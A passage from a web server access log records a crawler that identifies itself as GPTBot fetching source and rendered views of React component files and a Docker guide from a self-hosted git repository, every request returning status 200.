AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" +[17/Feb/2026:15:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" +[17/Feb/2026:15:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14666] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" +[17/Feb/2026:15:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" +[17/Feb/2026:15:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" +[17/Feb/2026:15:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14211] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" +[17/Feb/2026:15:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14182] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" +[17/Feb/2026:15:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" +[17/Feb/2026:15:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" +[17/Feb/2026:15:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" +[17/Feb/2026:15:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16485] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" +[17/Feb/2026:15:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14799] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" +[17/Feb/2026:15:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" +[17/Feb/2026:15:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14827] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" +[17/Feb/2026:15:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13941] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" +[17/Feb/2026:15:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15558] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" +[17/Feb/2026:15:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16485] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" +[17/Feb/2026:15:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" +[17/Feb/2026:15:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15560] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" +[17/Feb/2026:15:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" +[17/Feb/2026:15:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" +[17/Feb/2026:15:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" +[17/Feb/2026:15:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13891] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" +[17/Feb/2026:15:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14672] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" +[17/Feb/2026:15:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13890] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" +[17/Feb/2026:15:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" +[17/Feb/2026:15:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" +[17/Feb/2026:15:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" +[17/Feb/2026:15:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13941] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" +[17/Feb/2026:15:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14213] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" +[17/Feb/2026:15:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" +[17/Feb/2026:15:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" +[17/Feb/2026:15:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" +[17/Feb/2026:15:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14639] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" +[17/Feb/2026:15:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" +[17/Feb/2026:15:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16485] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" +[17/Feb/2026:15:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13861] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" +[17/Feb/2026:15:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" +[17/Feb/2026:15:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13941] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" +[17/Feb/2026:15:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14827] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" +[17/Feb/2026:15:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" +[17/Feb/2026:15:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" +[17/Feb/2026:15:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13943] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" +[17/Feb/2026:15:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13890] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" +[17/Feb/2026:15:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" +[17/Feb/2026:15:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" +[17/Feb/2026:15:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13891] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" +[17/Feb/2026:15:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" +[17/Feb/2026:15:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16486] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" +[17/Feb/2026:15:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14214] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" +[17/Feb/2026:15:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" +[17/Feb/2026:15:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16455] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" +[17/Feb/2026:15:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15903] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" +[17/Feb/2026:15:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md?display=source" [Client 74.7.227.38] [Length 22115] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" +[17/Feb/2026:15:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr 